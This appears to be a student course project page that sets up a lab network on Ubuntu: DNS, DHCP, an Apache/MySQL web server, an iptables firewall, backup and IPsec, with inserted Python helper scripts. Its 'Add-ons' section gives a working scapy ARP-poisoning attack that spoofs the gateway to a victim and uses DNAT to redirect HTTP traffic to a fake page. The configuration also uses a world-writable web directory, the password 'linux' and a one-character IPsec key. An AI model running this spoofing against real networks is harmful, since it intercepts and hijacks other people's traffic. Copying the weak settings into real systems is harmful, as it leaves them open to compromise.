Data Networking/Spring 2017/JXM

Motivation


As a network engineer, it is essential to understand and implement network configurations on the Linux operating system. This project aims to design a dynamic network solution built from a Domain Name System (DNS) server, a Dynamic Host Configuration Protocol (DHCP) server, a web server, a firewall and a backup server. Servers and clients obtain their IP addresses automatically from the DHCP server and resolve names through the DNS server, and clients fetch web pages from the web server. In addition, the firewall and the backup server provide a secure and robust network configuration for the company.

Team Members


Junhao Huang

Xinchen Zhang

Mayank Kashyap

Behavior of Protocols


Domain Name System


Domain Name System (DNS) is a hierarchical naming system for computers and services. It translates domain names to numerical IP addresses. A DNS name server stores the DNS records for a domain and answers queries from that database. The most common record types stored in a DNS database are:

  1. A and AAAA: IPv4 and IPv6 addresses
  2. NS: Name Server, the hostname of the authoritative server for the zone
  3. MX: SMTP mail exchangers, the servers that accept electronic mail for the domain
  4. CNAME: a Canonical Name record maps an alias to its canonical domain name
  5. PTR: IP address to hostname translation (reverse lookup)

Dynamic Host Configuration Protocol


Dynamic Host Configuration Protocol (DHCP) is a client/server protocol that automatically provides an Internet Protocol (IP) host with its IP address and other related configuration information such as the subnet mask and default gateway. RFCs 2131 and 2132 define DHCP as an Internet Engineering Task Force (IETF) standard based on Bootstrap Protocol (BOOTP), a protocol with which DHCP shares many implementation details. DHCP allows hosts to obtain required TCP/IP configuration information from a DHCP server.

Why is DHCP required?

Every device on a TCP/IP-based network must have a unique unicast IP address to access the network and its resources. Without DHCP, IP addresses for new computers or computers that are moved from one subnet to another must be configured manually; IP addresses for computers that are removed from the network must be manually reclaimed. With DHCP, this entire process is automated and managed centrally. The DHCP server maintains a pool of IP addresses and leases an address to any DHCP-enabled client when it starts up on the network. Because the IP addresses are dynamic (leased) rather than static (permanently assigned), addresses no longer in use are automatically returned to the pool for reallocation. The network administrator establishes DHCP servers that maintain TCP/IP configuration information and provide address configuration to DHCP-enabled clients in the form of a lease offer. The DHCP server stores the configuration information in a database that includes:

  • Valid TCP/IP configuration parameters for all clients on the network.
  • Valid IP addresses, maintained in a pool for assignment to clients, as well as excluded addresses.
  • Reserved IP addresses associated with particular DHCP clients. This allows consistent assignment of a single IP address to a single DHCP client.
  • The lease duration, or the length of time for which the IP address can be used before a lease renewal is required.

A DHCP-enabled client, upon accepting a lease offer, receives:

  • A valid IP address for the subnet to which it is connecting.
  • Requested DHCP options, which are additional parameters that a DHCP server is configured to assign to clients. Some examples of DHCP options are Router (default gateway), DNS Servers, and DNS Domain Name. For a full list of DHCP options, see DHCP Tools and Options.[1]

Webserver


The basic function of a web server is storing, processing and delivering web pages to clients; in other words, a web server hosts web pages for clients.

Apache2 is a popular choice for building a web server on Linux. phpMyAdmin is a convenient tool for administering the web server's MySQL database.

Firewall


A firewall is a system that protects a network from attacks coming from the Internet. It acts as a barrier between the internal network and outside networks.

By configuring rules on the server we accept only the services we want and block everything else, keeping the internal network safe from the potential dangers of the Internet.

Backup


In case the web server is damaged, a backup server stores copies of its files and data on the network, so that the files and data are not lost when the web server fails.

Requirements

  • Configure a DNS server to resolve domain names and reverse domains
  • Configure a DHCP server to assign IPv4 and IPv6 addresses dynamically
  • Implement a web server to host a web page
  • Implement a backup server to automatically install the server files using SSH and a NFS server
  • Create a firewall to provide the security

Steps and Commands


Master DNS

Step 1: Install the BIND9 DNS server:

        sudo apt-get install bind9

Step 2: Change the hostname and hosts files:

        sudo nano /etc/hostname
        ubuntu
        sudo nano /etc/hosts
        127.0.0.1     localhost
        192.168.10.2  ubuntu.jjxm.com ubuntu

Step 3: Edit the name servers:

        sudo nano /etc/resolvconf/resolv.conf.d/head
        nameserver 192.168.10.2
        nameserver 192.168.10.3
        search jjxm.com

Step 4: Edit the forwarders:

        sudo nano /etc/bind/named.conf.options
        forwarders {
                192.168.10.1;
                192.168.10.2;
                192.168.10.3;
        };

Step 5: Edit the forward and reverse zones in /etc/bind/named.conf.local:

             #Forward IPv4 zone
             zone "jjxm.com" {
             type master;
             file "/etc/bind/db.jjxm.com";
             allow-transfer { 192.168.10.3; };       # only the slave may pull the zone
             also-notify { 192.168.10.3; };          # tell the slave when the serial changes
             };
             #Reverse IPv4 zone
             zone "10.168.192.in-addr.arpa" {
             type master;
             file "/etc/bind/db.192";
             allow-transfer { 192.168.10.3; };
             also-notify { 192.168.10.3; };
             };
             #Reverse IPv6 zone (1188::/64)
             zone "0.0.0.0.0.0.0.0.0.0.0.0.8.8.1.1.ip6.arpa" {
             type master;
             file "/etc/bind/db.2001";
             allow-transfer { 192.168.10.3; };
             also-notify { 192.168.10.3; };
             };

Step 6: Create the zone files:

        sudo nano /etc/bind/db.jjxm.com
        
               ; BIND data file for jjxm.com
               ;
               $TTL    604800
               @       IN      SOA     jjxm.com.     root.jjxm.com.        (
                                             6         ; Serial
                                        604800         ; Refresh
                                         86400         ; Retry
                                       2419200         ; Expire
                                        604800 )       ; Negative Cache TTL
               ;
               @       IN      NS      ubuntu.jjxm.com.
               @       IN      A       192.168.10.2
               @       IN      AAAA    1188::2222
               ubuntu  IN      A       192.168.10.2
               ubuntu  IN      AAAA    1188::2222
               www     IN      A       192.168.10.7
               www     IN      AAAA    1199::3333
               a       IN      CNAME   www
               b       IN      CNAME   www
               c       IN      CNAME   www
               d       IN      CNAME   www


        sudo nano /etc/bind/db.192
        
            ; BIND reverse data file for 192.168.10.0/24
            ;
            $TTL    604800
            @       IN      SOA     ubuntu.jjxm.com. root.jjxm.com. (
                                        8         ; Serial
                                    604800         ; Refresh
                                     86400         ; Retry
                                   2419200         ; Expire
                                    604800 )       ; Negative Cache TTL
            ;
            @       IN      NS      ubuntu.jjxm.com.
            ; owner = last octet of the address; each PTR must point back to the
            ; name that carries the matching A record in db.jjxm.com
            2       IN      PTR     ubuntu.jjxm.com.
            7       IN      PTR     www.jjxm.com.
            ; a, b, c and d are CNAMEs of www (192.168.10.7); extra PTRs for them are optional
            7       IN      PTR     a.jjxm.com.
            7       IN      PTR     b.jjxm.com.
            7       IN      PTR     c.jjxm.com.
            7       IN      PTR     d.jjxm.com.


        sudo nano /etc/bind/db.2001
        
            ; BIND reverse data file for 1188::/64
            ;
            $TTL    604800
            @       IN      SOA     ubuntu.jjxm.com.  root.jjxm.com. (
                                        4         ; Serial
                                    604800         ; Refresh
                                     86400         ; Retry
                                   2419200         ; Expire
                                    604800 )       ; Negative Cache TTL
            ;
            @       IN      NS      ubuntu.jjxm.com.

            ; owner = the 16 host nibbles of the address in reverse order:
            ; 1188::2222 is 1188:0000:0000:0000:0000:0000:0000:2222, so the host
            ; part 0000:0000:0000:2222 becomes 2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0
            2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0     IN    PTR   ubuntu.jjxm.com.
            ; www.jjxm.com (1199::3333) and its aliases lie outside 1188::/64, so their
            ; PTRs do not belong here; they need a 0.0.0.0.0.0.0.0.0.0.0.0.9.9.1.1.ip6.arpa
            ; zone with owner 3.3.3.3.0.0.0.0.0.0.0.0.0.0.0.0
            ; 2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0     IN    PTR   www.jjxm.com.
            ; 2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0     IN    PTR   a.jjxm.com.
            ; 2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0     IN    PTR   b.jjxm.com.
            ; 2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0     IN    PTR   c.jjxm.com.
            ; 2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0     IN    PTR   d.jjxm.com.
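Reverse zones only work when every PTR mirrors an A or AAAA record in the forward zone, and IPv6 nibble names are easy to get wrong by hand. The following checker is an added example (not part of the page's or the project's files): it parses the A/AAAA records from this page's forward zone and the PTR records from a pair of reverse zones, both embedded as constructed samples, and reports every address whose reverse name is missing, points at the wrong host, or is not covered by any reverse zone.

```python
import ipaddress

# Constructed sample data: the A/AAAA records of the forward zone on this page
# (db.jjxm.com, origin jjxm.com.) and two reverse zones with the kind of
# mistakes that creep in when the files are typed by hand: a wrong octet,
# a wrong nibble string, and a host whose prefix the zone does not cover.
ORIGIN = "jjxm.com."

FORWARD_ZONE = """
ubuntu  IN  A     192.168.10.2
ubuntu  IN  AAAA  1188::2222
www     IN  A     192.168.10.7
www     IN  AAAA  1199::3333
"""

REVERSE_ZONES = {
    "10.168.192.in-addr.arpa.": """
2  IN  PTR  ubuntu.jjxm.com.
1  IN  PTR  www.jjxm.com.
""",
    "0.0.0.0.0.0.0.0.0.0.0.0.8.8.1.1.ip6.arpa.": """
1.1.1.1.0.0.0.0.0.0.0.0.0.0.0.0  IN  PTR  ubuntu.jjxm.com.
2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0  IN  PTR  www.jjxm.com.
""",
}


def _records(text, rtypes):
    """Yield (owner, rdata) for records of the given types; ';' comments are ignored."""
    for line in text.splitlines():
        fields = line.split(";", 1)[0].split()
        if len(fields) == 4 and fields[1] == "IN" and fields[2] in rtypes:
            yield fields[0], fields[3]


def reverse_name(address):
    """Full reverse-lookup name of an IPv4/IPv6 address, with trailing dot,
    e.g. 192.168.10.7 -> 7.10.168.192.in-addr.arpa. and
    1188::2222 -> 2.2.2.2.<24 zero nibbles>.8.8.1.1.ip6.arpa."""
    return ipaddress.ip_address(address).reverse_pointer + "."


def check_zones(origin, forward_text, reverse_zones):
    """Return a list of findings, one per forward/reverse inconsistency."""
    expected = {}   # reverse name -> fqdn the PTR should point to
    for owner, addr in _records(forward_text, {"A", "AAAA"}):
        expected[reverse_name(addr)] = owner + "." + origin
    actual = {}     # reverse name -> fqdn the PTR actually points to
    for zone, text in reverse_zones.items():
        for owner, target in _records(text, {"PTR"}):
            actual[owner + "." + zone] = target
    findings = []
    for rname, fqdn in sorted(expected.items()):
        if not any(rname.endswith("." + zone) for zone in reverse_zones):
            findings.append(f"no reverse zone covers {rname} ({fqdn})")
        elif rname not in actual:
            findings.append(f"missing PTR for {rname} ({fqdn})")
        elif actual[rname] != fqdn:
            findings.append(f"{rname} points to {actual[rname]}, expected {fqdn}")
    # PTRs that no forward record explains are stale or mistyped
    for rname, target in sorted(actual.items()):
        if rname not in expected:
            findings.append(f"PTR {rname} -> {target} has no matching A/AAAA record")
    return findings


if __name__ == "__main__":
    for finding in check_zones(ORIGIN, FORWARD_ZONE, REVERSE_ZONES):
        print(finding)
```

Run against the sample it flags five problems; against zone files whose owners were derived with reverse_name() it returns an empty list.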

Step 7: Restart bind9

        sudo /etc/init.d/bind9 restart

Slave DNS

Step 1: Edit the forward and reverse zones in /etc/bind/named.conf.local:

             #Forward IPv4 zone
             #A slave zone names the master it transfers from with "masters";
             #named must be able to write the slave copy, and on Ubuntu the
             #writable directory is /var/cache/bind/, so a path there avoids permission errors
             zone "jjxm.com" {
             type slave;
             file "/etc/bind/db.jjxm.com";
             masters { 192.168.10.2; };
             };
             #Reverse IPv4 zone
             zone "10.168.192.in-addr.arpa" {
             type slave;
             file "/etc/bind/db.192";
             masters { 192.168.10.2; };
             };
             #Reverse IPv6 zone
             zone "0.0.0.0.0.0.0.0.0.0.0.0.8.8.1.1.ip6.arpa" {
             type slave;
             file "/etc/bind/db.2001";
             masters { 192.168.10.2; };
             };

Step 2: Restart bind9

        sudo /etc/init.d/bind9 restart

DHCP


To install the DHCP server, open a new Ubuntu VM to serve as the DHCP server for your network. Once configured, this server can no longer reach the Internet, because its domain name and name servers are changed to the lab's. We use the ISC (Internet Systems Consortium) DHCP server in this project; the installation steps follow:

Step 1: Install ISC's DHCP server from the terminal:

sudo apt-get install isc-dhcp-server

Step 2: Set the network interface "ens33" in the isc-dhcp-server file located in /etc/default/, and enable IPv6 by setting OPTIONS="-6"

sudo nano /etc/default/isc-dhcp-server

#Inside the file, edit the following:
OPTIONS="-6"

INTERFACES="ens33"

Step 3: Make edits and changes to the DHCP configuration file for IPv4

#Comment the option domain-name and option domain-name servers as we'll define them later 

#Uncomment authoritative

authoritative;

subnet 192.168.10.0 netmask 255.255.255.0 {
  range 192.168.10.20 192.168.10.100;
  option domain-name-servers 192.168.10.2, 192.168.10.3;
  option domain-name "jjxm.com";
  option routers 192.168.10.1;
  option broadcast-address 192.168.10.255;
  default-lease-time 21600;
  max-lease-time 43200;
}

host Webserver {
  hardware ethernet 00:0c:29:f5:9c:e8;
  fixed-address 192.168.10.7;
}

host MainDns {
  hardware ethernet 00:0c:29:45:fc:50;
  fixed-address 192.168.10.2;
}

host SlaveDns {
  hardware ethernet 00:0c:29:47:f3:29;
  fixed-address 192.168.10.3;
}
host Backup {
  hardware ethernet 00:0c:29:60:9f:da;
  fixed-address 192.168.10.10;
}

Step 4: Make changes to the virtual machine's interfaces by changing the interfaces file in /etc/network/

sudo nano /etc/network/interfaces

#Write the following

auto lo
iface lo inet loopback

auto ens33
iface ens33 inet static
 address 192.168.10.6
 netmask 255.255.255.0
 gateway 192.168.10.1
 network 192.168.10.0
 broadcast 192.168.10.255
 dns-nameservers 192.168.10.2 192.168.10.3
 dns-search jjxm.com

iface ens33 inet6 static
 address 2001:0db8:20ad:f103::6
 netmask 64

Step 5: Edit the resolver file

sudo nano /etc/resolv.conf

#add the following line to this file

nameserver 192.168.10.2
#this is the main DNS server

Step 6: Enable IPv4 and IPv6 forwarding

sudo nano /etc/sysctl.conf:

#in this file, uncomment these:

    net.ipv4.conf.default.rp_filter=1
    net.ipv4.ip_forward=1
    net.ipv6.conf.all.forwarding=1

Step 7: Install radvd for IPv6 advertising using the following command

sudo apt-get install radvd

Step 8: Configure dhcpd6.conf to add IPv6 address pool

sudo nano /etc/dhcp/dhcpd6.conf

#Make the following changes in this file

ddns-update-style none;

authoritative;

allow leasequery;

dhcpv6-lease-file-name "/var/lib/dhcp/dhcpd6.leases";
log-facility local7;

subnet6 2001:0db8:20ad:f103::/64 {
 range6 2001:0db8:20ad:f103::20 2001:0db8:20ad:f103::100;
 # the DNS servers' fixed IPv6 addresses, as reserved below
 option dhcp6.name-servers 2001:0db8:20ad:f103::2,
 2001:0db8:20ad:f103::3;
 option dhcp6.domain-search "jjxm.com";
 default-lease-time 21600;
 max-lease-time 43200;

 # DHCPv6 reservations use fixed-address6; matching on "hardware ethernet"
 # works for clients whose DUID is built from the MAC (DUID-LL / DUID-LLT)
 host Webserver {
  hardware ethernet 00:0c:29:f5:9c:e8;
  fixed-address6 2001:0db8:20ad:f103::7;
 }

 host MainDns {
  hardware ethernet 00:0c:29:45:fc:50;
  fixed-address6 2001:0db8:20ad:f103::2;
 }

 host SlaveDns {
  hardware ethernet 00:0c:29:47:f3:29;
  fixed-address6 2001:0db8:20ad:f103::3;
 }

 host Backup {
  hardware ethernet 00:0c:29:60:9f:da;
  fixed-address6 2001:0db8:20ad:f103::10;
 }

}

Step 9: Edit radvd configuration file

sudo nano /etc/radvd.conf 

#in this file, write the following:

interface ens33 {
 AdvSendAdvert on;
 AdvOtherConfigFlag off;

 prefix 2001:0db8:20ad:f103::/64 {
  AdvOnLink on;
  AdvAutonomous on;
  AdvRouterAddr on;
 };
};

Step 10: Restart the network interface (NOTE: THIS WILL DISABLE YOUR INTERNET CONNECTION IN THE VM)

sudo /etc/init.d/networking restart

Step 11: Start the DHCP server for IPv4 and IPv6

sudo service isc-dhcp-server start
sudo service isc-dhcp-server6 start

Web server


Step 1: We use Apache as our web server, so we install Apache first. Command:

              sudo apt-get update 
              sudo apt-get install apache2    
          

Step 2: Install PHP Command:

              sudo apt-get install php      


Step 3: Install MySQL, and set the password to "linux". Command:

              sudo apt-get install mysql-server        


Step 4: Check that MySQL is listening. Command and expected output:

              sudo netstat -tap | grep mysql 
              tcp        0      0 localhost:mysql         *:*                     LISTEN      841/mysqld
        


Step 5: Install phpmyadmin, choose apache when installing, and also set the password as "linux" Command:

              sudo apt-get install phpmyadmin      

Step 6: To create the phpMyAdmin link we have to use chmod to change the permissions of /var/www. Note that 777 makes the directory world-writable; giving the directory to your own user with chown, or write access to the www-data group, is the safer choice. Command:

              sudo chmod 777 /var/www      

Step 7: Create the phpMyAdmin link from /usr/share/phpmyadmin into /var/www/html; afterwards a phpmyadmin entry appears in /var/www/html. Command:

              sudo ln -s /usr/share/phpmyadmin /var/www/html       


Step 8: Create a basic webpage “Index.htm”, and we can see an index.html file in /var/www/html

Step 9: Go into the configuration of apache2 and change the default webpage catalog “/var/www” to “/home/ttno1”, and there is no '/' after directory path Command:

              sudo vi /etc/apache2/apache2.conf


Step 10: Go into the configuration of 000-default and change the default webpage catalog “/var/www/html” to “/home/ttno1” Command:

              sudo vi /etc/apache2/sites-available/000-default.conf


Step 11: We need to restart the apache Command:

              sudo /etc/init.d/apache2 restart  


Step 12: Use the browser on another host to visit the web server with its IP address.

Firewall[2]


Step 1: List the current rules in iptables. If you have never set up rules on this server before, you should see three empty chains with the default policy ACCEPT.

Command:

               sudo iptables -L

Output:

               Chain INPUT (policy ACCEPT)
               target     prot opt source               destination

               Chain FORWARD (policy ACCEPT)
               target     prot opt source               destination

               Chain OUTPUT (policy ACCEPT)
               target     prot opt source               destination

Step 2: Allow established sessions to receive traffic

Command:

               sudo iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT

If the command above does not work (older kernels without the conntrack match), try the following one:

sudo iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT

Step 3: Open the ports for SSH, HTTP, FTP, TFTP, DHCP, DNS and VPN

Command:

               sudo iptables -A INPUT -p tcp --dport 22 -j ACCEPT      # SSH
               sudo iptables -A INPUT -p tcp --dport 80 -j ACCEPT      # HTTP
               sudo iptables -A INPUT -p tcp --dport 443 -j ACCEPT     # HTTPS
               sudo iptables -A INPUT -p tcp --dport 20 -j ACCEPT      # FTP data
               sudo iptables -A INPUT -p tcp --dport 21 -j ACCEPT      # FTP control
               sudo iptables -A OUTPUT -p tcp --dport 20 -j ACCEPT
               sudo iptables -A OUTPUT -p tcp --dport 21 -j ACCEPT
               sudo iptables -A INPUT -p tcp --dport 53 -j ACCEPT      # DNS over TCP (zone transfers, large answers)
               sudo iptables -A INPUT -p udp --dport 53 -j ACCEPT      # DNS queries are mostly UDP
               sudo iptables -A INPUT -p udp --dport 546 -j ACCEPT     # DHCPv6 client port (UDP, not TCP)
               sudo iptables -A INPUT -p udp --dport 547 -j ACCEPT     # DHCPv6 server port; DHCPv4 would need UDP 67
               sudo iptables -A INPUT -p tcp --dport 1723 -j ACCEPT    # PPTP
               sudo iptables -A INPUT -p udp --dport 500 -j ACCEPT     # IKE (IPsec)
               sudo iptables -A INPUT -p udp --dport 4500 -j ACCEPT    # IKE NAT traversal
               sudo iptables -A INPUT -p udp --dport 69 -j ACCEPT      # TFTP
               sudo iptables -A OUTPUT -p udp --dport 69 -j ACCEPT
               sudo iptables -A INPUT -p udp --dport 1701 -j ACCEPT    # L2TP
               sudo iptables -A INPUT -p tcp --dport 21 -m state --state NEW,ESTABLISHED -j ACCEPT
               sudo iptables -A OUTPUT -p tcp --sport 21 -m state --state ESTABLISHED -j ACCEPT


Step 4: Accept packets arriving on the loopback interface, inserted at the top of the INPUT chain, so that local services can communicate with each other.

Command:

               sudo iptables -I INPUT 1 -i lo -j ACCEPT


Step 5: Accept all traffic on loopback interface

Command:

               sudo iptables -A INPUT -i lo -j ACCEPT
               sudo iptables -A OUTPUT -o lo -j ACCEPT


Step 6: To establish outgoing connections

Command:

               sudo iptables -A OUTPUT -m conntrack --ctstate ESTABLISHED -j ACCEPT


Step 7: Set up from internal to external

Command:

               sudo iptables -A FORWARD -i ens33 -o ens33 -j ACCEPT


Step 8: To drop Invalid Packets

Command:

               sudo iptables -A INPUT -m conntrack --ctstate INVALID -j DROP


Step 9: Deny ping (ICMP echo requests)

Command:

               sudo iptables -A INPUT -p icmp --icmp-type echo-request -j REJECT


Step 10: Limit each client to 10 concurrent SSH connections

Command:

               sudo iptables -A INPUT -p tcp --dport 22 -m connlimit --connlimit-above 10 -j REJECT


Step 11: To prevent HTTP flood

Command:

               sudo iptables -A INPUT -p tcp --dport 80 -m limit --limit 100/minute --limit-burst 200 -j ACCEPT


Step 12: If there is a need of block an IP Address

Command:

               sudo iptables -I INPUT -s 192.168.10.134 -j DROP


Step 13: If you would like to cancel the block IP address

Command:

               sudo iptables -D INPUT -s 192.168.10.134 -j DROP


Step 14: Permit VPN (IPsec) traffic

Command:

               sudo iptables -A INPUT -p udp --dport 500 -j ACCEPT
               sudo iptables -A INPUT -p udp --dport 4500 -j ACCEPT
               sudo iptables -A INPUT -p esp -j ACCEPT


Step 15: Drop everything else. This rule must be appended last: any rule appended with -A after it lands below it and is never reached, which is why Step 12 inserts with -I instead.

Command:

               sudo iptables -A INPUT -j DROP


Step 16: To preserve your iptables rules across reboots, install iptables-persistent

Command:

               sudo apt-get install iptables-persistent


Step 17: Once the rules are changed, run the following commands to save and reload them before and after reboot

Command:

               sudo netfilter-persistent save
               sudo netfilter-persistent reload
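An added model of first-match rule evaluation, not part of the page's configuration, that replays Steps 12, 13 and 15 and the ICMP REJECT of Step 9 on the INPUT chain: a DROP for one client inserted with -I wins because it sits first, the same rule appended with -A after the catch-all DROP of Step 15 is never reached, and an echo request gets REJECT, which is what the "destination port unreachable" in the firewall test reflects. The rules are a subset of those on the page (ports, states) and the packets are constructed.

```python
from dataclasses import dataclass
from typing import FrozenSet, List, Optional


@dataclass(frozen=True)
class Rule:
    target: str                              # ACCEPT, DROP or REJECT
    proto: Optional[str] = None              # -p tcp / udp / icmp
    dport: Optional[int] = None              # --dport
    src: Optional[str] = None                # -s
    in_iface: Optional[str] = None           # -i
    states: FrozenSet[str] = frozenset()     # --ctstate / --state
    icmp_type: Optional[str] = None          # --icmp-type


@dataclass(frozen=True)
class Packet:
    proto: str
    src: str
    state: str                               # NEW, ESTABLISHED, RELATED or INVALID
    dport: Optional[int] = None
    in_iface: str = "ens33"
    icmp_type: Optional[str] = None


def _matches(r: Rule, p: Packet) -> bool:
    """A rule matches when every match it specifies agrees with the packet."""
    return all([
        r.proto is None or r.proto == p.proto,
        r.dport is None or r.dport == p.dport,
        r.src is None or r.src == p.src,
        r.in_iface is None or r.in_iface == p.in_iface,
        not r.states or p.state in r.states,
        r.icmp_type is None or r.icmp_type == p.icmp_type,
    ])


class Chain:
    """One chain with a default policy; rules are evaluated top to bottom, first match wins."""

    def __init__(self, policy: str = "ACCEPT") -> None:
        self.policy = policy
        self.rules: List[Rule] = []

    def append(self, rule: Rule) -> None:              # iptables -A
        self.rules.append(rule)

    def insert(self, rule: Rule, pos: int = 1) -> None:  # iptables -I (1 = top)
        self.rules.insert(pos - 1, rule)

    def delete(self, rule: Rule) -> None:              # iptables -D with the same spec
        self.rules.remove(rule)

    def verdict(self, pkt: Packet) -> str:
        for r in self.rules:
            if _matches(r, pkt):
                return r.target
        return self.policy


def page_input_chain() -> Chain:
    """The INPUT chain in the order Steps 2, 3, 5, 8, 9 and 15 build it (subset of ports)."""
    c = Chain()
    c.append(Rule("ACCEPT", states=frozenset({"ESTABLISHED", "RELATED"})))   # Step 2
    c.append(Rule("ACCEPT", proto="tcp", dport=22))                         # Step 3
    c.append(Rule("ACCEPT", proto="tcp", dport=80))
    c.append(Rule("ACCEPT", proto="tcp", dport=443))
    c.append(Rule("ACCEPT", in_iface="lo"))                                 # Step 5
    c.append(Rule("DROP", states=frozenset({"INVALID"})))                   # Step 8
    c.append(Rule("REJECT", proto="icmp", icmp_type="echo-request"))        # Step 9
    c.append(Rule("DROP"))                                                  # Step 15
    return c


def block_rule(ip: str) -> Rule:
    """The rule of Steps 12 and 13: -s <ip> -j DROP."""
    return Rule("DROP", src=ip)


def demo():
    web = Packet("tcp", "192.168.10.134", "NEW", dport=80)   # constructed client request
    ping = Packet("icmp", "192.168.10.134", "NEW", icmp_type="echo-request")
    c = page_input_chain()
    before = c.verdict(web)                     # ACCEPT: tcp/80 is opened in Step 3
    c.insert(block_rule("192.168.10.134"))      # Step 12: -I puts the rule first
    blocked = c.verdict(web)                    # DROP
    c.delete(block_rule("192.168.10.134"))      # Step 13: -D removes it again
    after = c.verdict(web)                      # ACCEPT
    late = page_input_chain()
    late.append(block_rule("192.168.10.134"))   # -A instead of -I: sits below Step 15's DROP
    return before, blocked, after, late.verdict(web), c.verdict(ping)
```

demo() returns ("ACCEPT", "DROP", "ACCEPT", "ACCEPT", "REJECT"); the fourth value shows that the appended block never takes effect.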

Backup


Step 1: We use rsync to set up the backup server.

 sudo apt-get install rsync

Step 2: Then we install SSH on the web server and the backup server.

sudo apt-get install ssh

Step 3: Generate an RSA key

ssh-keygen -t rsa

Step 4: Copy the public key to the other host.

ssh-copy-id b@192.168.10.10

Step 5: Create a backup zip file on the master server:

sudo crontab -e

Step 6: The files are zipped and compressed:

21 20 * * * sudo zip -r /home/b/backup -j /home/b/jjxm

Step 7: The zip is transferred to the backup server

sudo crontab -e

Step 8: Unzip the original files

40 20 * * * sudo unzip -o /home/b/Backup -d /home/b/jjxm

Testing Procedure


Step 1: Use the "nslookup" command to query the DNS server for different hostnames.

Step 2: Use the "dig" command to check the DNS records and zone files.

Step 3: Turn the master DNS off and check nslookup again.

DHCP


Step 1: Use the following command to check the status of dhcp server

sudo service isc-dhcp-server status

#It should show the following output:

 isc-dhcp-server.service - ISC DHCP IPv4 server
   Loaded: loaded (/lib/systemd/system/isc-dhcp-server.service; enabled; vendor 
   Active: active (running) since Fri 2017-04-14 19:04:35 PDT; 1h 33min ago
     Docs: man:dhcpd(8)
 Main PID: 1184 (dhcpd)
   CGroup: /system.slice/isc-dhcp-server.service
           └─1184 dhcpd -user dhcpd -group dhcpd -f -4 -pf /var/run/dhcp-server/


#The same is to be followed for IPv6 dhcp with the following command

sudo service isc-dhcp-server6 status

Step 2: To check if DHCP is leasing out addresses and other updates like acknowledgments and requests, use the following command after connecting DHCP to client. The red text represents the errors.

journalctl -xe

Step 3: Check output at client's and other hosts' end. If the hosts receive the addresses that were specified as static addresses by DHCP and if client receives an address in the range defined by DHCP, then our test procedure is successful.

Web Server


Step 1: Turn on your web server.

Step 2: Open a browser on a client and enter the IP address of the web server to check whether we can reach the server's webpage.

Firewall


Method 1


Ping the client's IP address from the terminal of the web server's Ubuntu: it succeeds.

Ping the web server's IP address from the terminal of the client: it reports destination port unreachable, because the REJECT target of Step 9 answers echo requests with an ICMP port-unreachable error instead of silently dropping them.

Method 2


Step 1: Open a browser and enter the IP address of the web server in a client.

Step 2: Block the IP address of the client by adding an iptables rule in the terminal of the web server.

Step 3: Refresh the webpage on the client side and see whether it still loads.

Step 4: Delete the iptables rule to let the client reach the web server again.

Step 5: Try again to refresh the webpage in the client side.

Backup


Check the files after the set time in crontab.

Integrated Testing

Add-ons


Step 1: We use scapy[3] and Python for our ARP poisoning demonstration, so we install scapy first. Command:

              sudo apt-get install tcpdump python3-crypto ipython3
              sudo apt install python-scapy
              sudo apt install sysv-rc-conf

Step 2: To be the superuser and get higher authority, we reset the root password. Command:

              sudo passwd root 

Step 3: Start iptables after reboot Command:

              sudo sysv-rc-conf --level 2345 iptables on

Step 4: Turn on IP forwarding Command:

              sudo bash -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'

Step 5: Configure Scapy arp poison Command:

              scapy
              op=2
              victim= '192.168.10.28' 
              spoof= '192.168.10.1'         
              mac='00:0c:29:73:56:67' 
              arp=ARP(op=op,psrc=spoof,pdst=victim,hwdst=mac)
              send(arp)
              op =1
              arp=ARP(op=op,psrc=spoof,pdst=victim,hwdst=mac)
              send(arp)
              send(arp,inter=2,count=1000)      

Step 6: Make a fake web page Command:

              /etc/init.d/apache2 start
              echo “HAHA U LOSE.” > /home/Mayank/index.htm

Step 7: Forward the traffic Command:

              iptables -t nat --flush
              iptables --zero
              iptables -A FORWARD --in-interface ens33 -j ACCEPT
              iptables -t nat --append POSTROUTING --out-interface ens33 -j MASQUERADE
              iptables -t nat -A PREROUTING -p tcp --dport 80 --jump DNAT --to-destination 192.168.10.30

IPSec


IPSec can be configured in any two virtual machines. In our case, we are configuring IPSec between two Ubuntu VMs with IP addresses: 192.168.10.21 and 192.168.10.25.

Step 1: Install IPsec on the first host using the following command

sudo apt-get install ipsec-tools strongswan-starter

Step 2: Go to the ipsec.conf file at /etc/ to update the parameters

#on both hosts, type this command:

sudo nano /etc/ipsec.conf

#Host 1

conn host1-to-host2
       authby=secret
       auto=route
       keyexchange=ike
       left=192.168.10.21 
       right=192.168.10.25
       type=transport
       esp=aes128gcm16!
       
#Host 2

conn host2-to-host1
       authby=secret
       auto=route
       keyexchange=ike
       left=192.168.10.25
       right=192.168.10.21
       type=transport
       esp=aes128gcm16!

Step 3: Configure the secrets file on both hosts. The lab uses the one-character PSK "1", which is fine for this demonstration only; outside a lab a pre-shared key must be long and random.

#on both hosts

sudo nano /etc/ipsec.secrets

#host 1

192.168.10.21 192.168.10.25 : PSK "1"

#host 2

192.168.10.25 192.168.10.21 : PSK "1"

Step 4: Use this command to restart the ipsec processes

sudo ipsec restart

Step 5: Check the ipsec status

sudo ipsec statusall

#Obtain an output like this:


#Status of IKE charon daemon (strongSwan 5.3.5, Linux 4.4.0-31-generic, x86_64):
#  uptime: 7 seconds, since Apr 14 21:02:45 2017
#  malloc: sbrk 1351680, mmap 0, used 327664, free 1024016
#  worker threads: 11 of 16 idle, 5/0/0/0 working, job queue: 0/0/0/0, scheduled: 0
#  loaded plugins: charon test-vectors aes rc2 sha1 sha2 md4 md5 random nonce x509 revocation constraints pubkey pkcs1 pkcs7 pkcs8 pkcs12 pgp dnskey sshkey pem openssl fips-prf gmp agent xcbc hmac gcm attr kernel-netlink resolve socket-default connmark stroke updown
#Listening IP addresses:
#Connections:
#host1-to-host2:  192.168.10.21...192.168.10.25  IKEv1/2
#host1-to-host2:   local:  [192.168.10.21] uses pre-shared key authentication
